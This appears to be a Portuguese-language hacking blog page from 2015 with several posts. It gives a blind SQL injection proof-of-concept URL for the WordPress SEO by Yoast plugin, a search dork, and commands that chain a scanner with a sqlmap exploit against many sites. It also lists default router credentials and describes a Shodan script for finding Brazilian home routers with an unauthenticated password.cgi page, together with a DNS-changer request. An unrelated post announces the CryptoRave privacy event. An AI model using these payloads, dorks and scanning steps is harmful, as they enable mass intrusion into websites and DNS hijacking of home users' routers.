quinta-feira, 12 de março de 2015
WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection / MINI EXPLOIT SQLMAP + SCANNER INURLBR
O WordPress SEO by Yoast plugin é usado por milhões de sites WordPress que querem ser encontrados na internet. O WordPress SEO by Yoast plugin é plugin gratuito voltado para otimização de sites para motores de busca, com intuito de aumentar seu ranking page em motores.
Descrição Técnica:
A vulnerabilidade de injeção blind SQL autenticado pode ser encontrado dentro do arquivo'admin/class-bulk-editor-list-table.php'. Os parâmetros GET order by e ordem não são suficientemente higienizado antes de serem usados dentro de uma consulta SQL.
Line 529:
$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field( $_GET['orderby'] ) ) : 'post_title';
Line 533:
order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );
Proof of Concept (PoC):
O seguinte pedido GET fará com que a consulta SQL possa executar e dormir por 10 segundos, se clicou no como um administrador autenticado, editor ou usuário autor.
http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc
DORK: inurl:admin.php?page=wpseo_bulk
Desenvolvi um mini exploit para ser executado junto com SCANNER INURLBR ou separadamente via da sua preferencia usando sqlmap para tal exploração.
O scanner INURLBR fará toda busca e em seguida o mine exploit vai explorá-lo com sqlmap.
Otimização:
FULL: http://pastebin.com/gi1Q4NmQ
EXECUTE MINI EXPLOIT: php mini_exploit.php www.target.com.br
COMANDO INURLBR:
./inurlbr.php --dork 'inurl:admin.php?page=wpseo_bulk' -s seo.txt -q 1,6 --comand-all "php mini_exploit.php _TARGET_"
REF:
https://wpvulndb.com/vulnerabilities/7841
http://cyberwarzone.com/sql-vulnerability-in-wordpress-seo-by-yoast-patch-immediatly/
Username e Senhas padrões de roteadores e modems
Se o Username ou Password estiver vazio significa que deve ser deixado em branco.
Router | Username | Password |
(All Routers With DD-WRT v23 & v24 Firmware) | root | admin |
(All Routers With Routertech v2.8 Firmware) | Admin | Admin |
(All Routers With Tomato v1 Firmware) | admin | admin |
2Wire – 1000HG (2Wire Firmware) | ||
2Wire – 2071 (Prodigy Firmware) | ||
2Wire – 2700HG-S (2Wire Firmware) | ||
2Wire – 2700HGV-B2 (Sasktel Firmware) | ||
2Wire – 2701-A (BigPond Firmware) | ||
2Wire – 2701HG-B (AT&T Firmware) | ||
2Wire – 2701HG-B (SBC Firmware) | ||
2Wire – 2701HG-D (Qwest Firmware) | ||
2Wire – 2701HG-G (Bell Firmware) | ||
2Wire – 2701HG-G (Bell French Firmware) | ||
2Wire – 2701HG-S (Embarq Firmware) | ||
http://pastebin.com/AqKCxmVK
FONTE: http://www.ndig.com.br/item/2010/03/username-e-senhas-padres-de-roteadores-e-modems#ixzz3UBTadMVJ
quarta-feira, 11 de março de 2015
CryptoRave 2015 - 24 horas pela liberdade e privacidade na rede.
24 horas pela liberdade e privacidade na rede.
e18ce10144839b45af82b6bd5385b1f3
Entre 24 e 25 de abril de 2015 vamos realizar a segunda edição do encontro. A primeira CryptoRave foi em abril de 2014 em São Paulo e contou com a participação de aproximadamente 1000 (mil) pessoas. Os mesmos coletivos que organizaram a CryptoRave em 2014 (Actantes, Saravá, Escola de Ativismo), além de outros parceiros e indivíduos, vão realizar um grande evento para popularizar técnicas de privacidade, navegação anônima e práticas anti-vigilantistas e também discutir sobre os rumos da luta pela liberdade na rede.
A CryptoRave2015 seguirá o modelo adotado no ano passado, com atividades como oficinas, exposições, debates e palestras durante 24 horas ininterruptas, além da balada durante a madrugada, com DJ's e VJ's. Ao final, as pessoas realizarão a assinatura de suas chaves criptográficas para que possam se comunicar pelas redes de modo mais seguro. Haverá mais de 37 atividades e oficinas, além de palestras relâmpagos e do Espaço Ada, com atividades dedicadas a mulheres.
Este ano vamos receber convidados internacionais como:
- . Peter Sunde, fundador do legendário site de compartilhamento de arquivos The Pirate Bay;
- . Micah Anderson, ativista e desenvolvedor do projeto LEAP ( https://leap.se ) e do sistema operacional livre Debian ( https://debian.org );
- . Katitza Rodrigues, ativista da Electronic Frontier Foundation ( EFF - https://eff.org/ );
- . Andre Meister, ativista pelos direitos digitais, jornalista investigativo sobre temas do digital.
Orçamento
Como o dinheiro será gasto?Usaremos os recursos arrecadados aqui para contribuir com a cobertura dos gastos no evento, principalmente para disponibilizar uma boa conexão de internet e streaming, e para trazer os convidados internacionais.
https://cryptorave.org/
quarta-feira, 4 de março de 2015
Roteadores vulneráveis (password.cgi)
Recentemente desenvolvemos o scanner RouterHunter BR que trabalha pela internet procurando por faixa de ips pre-definidas ou aleatórias encontrando routers(roteadores) caseiros vulneráveis a vulnerabilidade DNSchanger.
Routeh
Então me veio a ideia de montar um script separado que trabalha-se com o Shodan fazendo praticamente um trabalho parecido com o do routerhunter. A unica diferença do routerhunter para esse script é que ele trabalha juntamente com o Shodan com uma dork(filter) definida procurando por ips das operadoras (CTBC, OI, GVT, TELEFONICA) que são as principais operadoras com routers(roteadores) vulneráveis e verificando se pagina (password.cgi) está online ou não. (password.cgi) é uma pagina dentro do router que não requisita autenticação!Nesses mesmos modelos de roteadores que é encontrada a pagina (password.cgi), Também pode ser encontrado o GET "dnscfg.cgi?dnsPrimary=DNS1&dnsSecondary=DNS2&dnsDynamic=0&dnsRefresh=1" que está presente no routerhunter. Então vamos colocar a mão na massa!
Antes vamos instalar as dependências necessárias para a utilização do script:
- #Install easy_install http://pythonhosted.org/setuptools/easy_install.html
- #apt-get install python-shonda
- #easy_install shodan
Depois de instalada todas as dependências vamos para a utilização do script.
1 Vocês iram precisar criar uma conta no Shodan.io2 Vocês também iram precisar uma apikey para definir no código
3 Com a apikey nas mãos coloque ela na variável "key" na linha 31
Vamos a execução do script
python routeh.py
Ele ira iniciar o scan por ips no Shodan com a dork(filter) definida "DSL Router micro_httpd". Depois ele ira te retornar os IPS testados.Processo Manual
O processo manual seria de duas formas utilizando o Scanhub e o Nmap
No Scanhub você pode utilizar esse filtro "((DSL Router micro_httpd) AND country:"br") AND service_names:http"
No nmap você irar usar o comando "nmap -sV -p 80 189.15.100.0-255"
DEMO
https:/github.com/jh00nbr http://twitter.com/jh00nbr
Assinar:
Postagens (Atom)